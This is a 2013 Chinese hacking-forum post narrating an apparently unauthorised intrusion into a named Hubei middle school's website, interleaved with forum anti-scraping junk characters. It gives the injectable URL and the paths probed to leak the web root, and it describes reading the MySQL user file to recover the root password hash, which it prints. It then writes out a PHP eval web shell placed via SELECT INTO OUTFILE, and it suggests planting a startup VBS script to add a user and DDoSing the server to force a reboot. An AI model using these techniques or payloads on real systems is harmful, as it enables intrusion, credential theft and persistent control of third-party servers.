找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 友情检测湖北省大治市第一中学
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3196|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏) H8 n5 }( o, U; `( x& h
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
5 \8 L# X3 G: U; F5 [* I- d
) ~4 q6 B# t! J' H
. Q$ Y1 _1 @) f  ^. L
3 ?: w/ G$ F6 Y- s8 U4 F常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 5 E# \, k+ i  s5 y) V2 W1 ^2 ?
: T! {. k; x# b
那么想可以直接写入shell ,getshell有几个条件:' x% Y) `. w( j/ X  b$ Z
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
6 T# b) i8 u, _$ z. D5 F1 j2 Q0 [2 |. B  ]
试着爆绝对路径:
% G) |: K8 @. x( B3 N& }1./phpMyAdmin/index.php?lang[]=1  7 R+ A6 y) j" A, }
2./phpMyAdmin/phpinfo.php  : N/ E5 [0 i9 F
3./load_file()  6 |; K; F3 X2 ~. @
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
* i6 h, ?9 n7 T& N" [9 A: y' ]" a( o5./phpmyadmin/libraries/select_lang.lib.php  
9 u5 A( {" i3 Y8 f% |/ \, Y8 ^6./phpmyadmin/libraries/lect_lang.lib.php  
( g& J% b1 e% X. T2 I7./phpmyadmin/libraries/mcrypt.lib.php   9 y  v! k9 j3 m1 z
8./phpmyadmin/libraries/export/xls.php  ; L+ u! b% f# b* y8 R; A

- j! C+ w9 |/ W% k1 y均不行...........................* L+ D; @2 l, u/ Y
) Q' a$ v+ X5 i$ L2 l& j$ K9 {
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php1 P3 ]; v  d8 b
' p3 E, h% `6 X  D% a, s/ A
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
6 M) G* E7 {8 }. [
& W, b$ y2 M9 n6 n默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
! V! t* A! q3 [4 {7 ?& j* s: c4 h. f2 _; x6 N. w, s$ B$ N9 k  q
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
0 a" p+ z1 w# j% R. q: d' g0 Q
" [& R7 Q$ {: L! A( O5 N  b想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
( S) h3 z5 C- g. F8 O4 s% @0 L3 m" s8 F1 P8 u. q# r4 i
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini . c$ n) k, ^3 i. w9 G2 }. D

" e. ^% k! M: ?/ A' L) k自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ( m" `: H3 c$ J5 t2 l) F9 F5 a6 Z8 c
+ s1 K; F. ^1 m7 Q. N3 j& Y6 T
成功读到root密码:
# v2 \$ y* u2 d' C
. {5 q* \, v" ~- V$ C17---- r(0072)0 X6 ^) \( {: M- u6 ?& G
18---- o(006f)
% L7 r/ Q0 Y, T( r2 m- l0 J19---- o(006f)
6 ^9 U+ @' Q; u: ?* k) G7 j20---- t(0074)3 _, u6 L: c3 L$ \, j0 m0 h, u
21---- *(002a)9 v+ `) q  N1 S7 l  F7 B8 S! e
22---- 8(0038)) U: S6 P# j  J
23---- 2(0032)$ O# _! R$ G9 {/ x8 P. j$ I% s
24---- E(0045)2 W& v' y1 I5 y4 x$ r1 A: R+ t1 a. u
25---- 1(0031): `, D: J, V2 ?/ Z9 p; Q
26---- C(0043)1 ?- F% w$ q0 H# p% P# x
27---- 5(0035)6 n6 j9 }" d0 ], P- e% X
28---- 8(0038)* [/ O' ~& H+ b; T% i0 t' i! e  q
29---- 2(0032)* A3 C& P& p4 N& ^) K6 M
30---- 8(0038)3 z2 Q) }6 ?0 w  g) Z- P
31---- A(0041)# t9 y2 D7 @; b% [
32---- 9(0039)
! s4 d& w) h1 r- i4 _4 M33---- B(0042): D0 g& h  C3 E  }& F  r
34---- 5(0035)' e; z7 G5 ]( @2 R6 W
35---- 4(0034)/ Z% D0 }( a8 u5 o
36---- 8(0038)# H. k1 M$ h  g% `8 X, ^( n% B! ]
37---- 6(0036)2 q3 T, U" B6 ^; Z" D
38---- 4(0034)( O- m9 `2 g/ J2 E1 G) e$ }
39---- 9(0039)
" H* A9 Z8 L) {! P, |40---- 1(0031)1 [/ r% q7 ]% q" c. L
41---- 1(0031)7 A  D0 O4 t1 l; F: E
42---- 5(0035)" ]' z4 k. f. B" d+ d+ Z9 j
43---- 3(0033)
2 K- b: M8 c! |2 r% r$ B! ]2 d44---- 5(0035); X' g* q% M% ~" q& ^  ^& w1 |
45---- 9(0039)
' K; o' T; y0 w9 C* {6 Y46---- 8(0038)
# a6 }( A' f& w. Y+ T47---- F(0046)
7 M2 ?, L. H9 ^. w2 p! ^& C) I48---- F(0046)) ^: j4 c9 h; n$ f  H- \
49---- 4(0034)5 v/ n1 ^- u( Y" @
50---- F(0046), D- P2 |6 y! v4 _. q" [) G/ P
51---- 0(0030)) t" z2 g8 A( D  A3 V9 _: |
52---- 3(0033)
/ _  V- j( m' [* i( n1 N53---- 2(0032)+ X+ b: ~: M; g! N8 F$ ]( ^9 s
54---- A(0041): P. h# l) j0 T7 ~  z
55---- 4(0034)6 A* Q. T  }! U" U" r
56---- A(0041)2 @" P9 g6 Y' ]* E0 r7 K3 G
57---- B(0042)
% K3 d- Y$ B7 N7 o) f58---- *(0044)
7 c# K6 o- V& `3 K6 |$ k1 M59---- *(0035): h# x3 k, w# P$ ~9 ?  r0 A
60---- *(0041)
- B' ?0 l# j+ n  o61---- *0032)$ J. Q2 e8 |/ l9 n, S% @) `
! R7 U7 c3 z( H- k7 [, A7 Z" I
解密后成功登陆phpmyamin
; A% P: f! Y) Y& x9 L7 d                          
" W+ F: V  X4 q# E& s1 K
, y% H- g6 L+ k) c- B' E9 Y6 s                             . T) G+ W- d; s

. n5 |; A& @; H' ?3 k$ N# E+ N找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'' Q0 [% _% L3 M4 c4 \0 A/ t

# X0 E1 y. C, G3 b: E成功执行,拿下shell,菜刀连接:  P3 t1 p+ B2 O& q2 b1 I- G7 `
2 x$ S* O5 c- r8 S5 |
服务器不支持asp,aspx,php提权无果...................9 O0 i& n  {) S8 n  D

& I( P/ X5 {$ z0 j& X( O+ ]但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
. l( ^0 T5 x; _- X
服务器上已经有个隐藏帐号了
6 S# i3 ^/ _$ M
别名     administrators
$ S, x* ^1 l, }: W/ @注释     管理员对计算机/域有不受限制的完全访问权
" D4 m/ l* @% B* O1 K$ o
成员
! B  F' P9 @0 q! U8 t
-------------------------------------------------------------------------------; C# k7 @* A" }/ g, a
admin
3 E6 d# l& o5 x) o% s  zAdministrator
% t% w0 U" V4 h1 Islipper$
. ?3 s5 S3 q4 m, fsqluser$ V, e! t+ I2 ]' Z  \
命令成功完成。 + v2 C3 F3 Y0 P

$ ]; q5 I+ v2 F( o$ p服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。2 Y: n5 K4 Y& ?/ v' i
& ^# K! o/ r4 S% r# u' N& d5 z4 N
ddos服务器重启,不然就只能坐等服务器重启了...............................
9 R1 m- Q0 l+ a7 D
. }; i8 ]8 D/ v1 K      

9 J- B" C/ C6 u+ E, R0 n- {

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

angel
沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表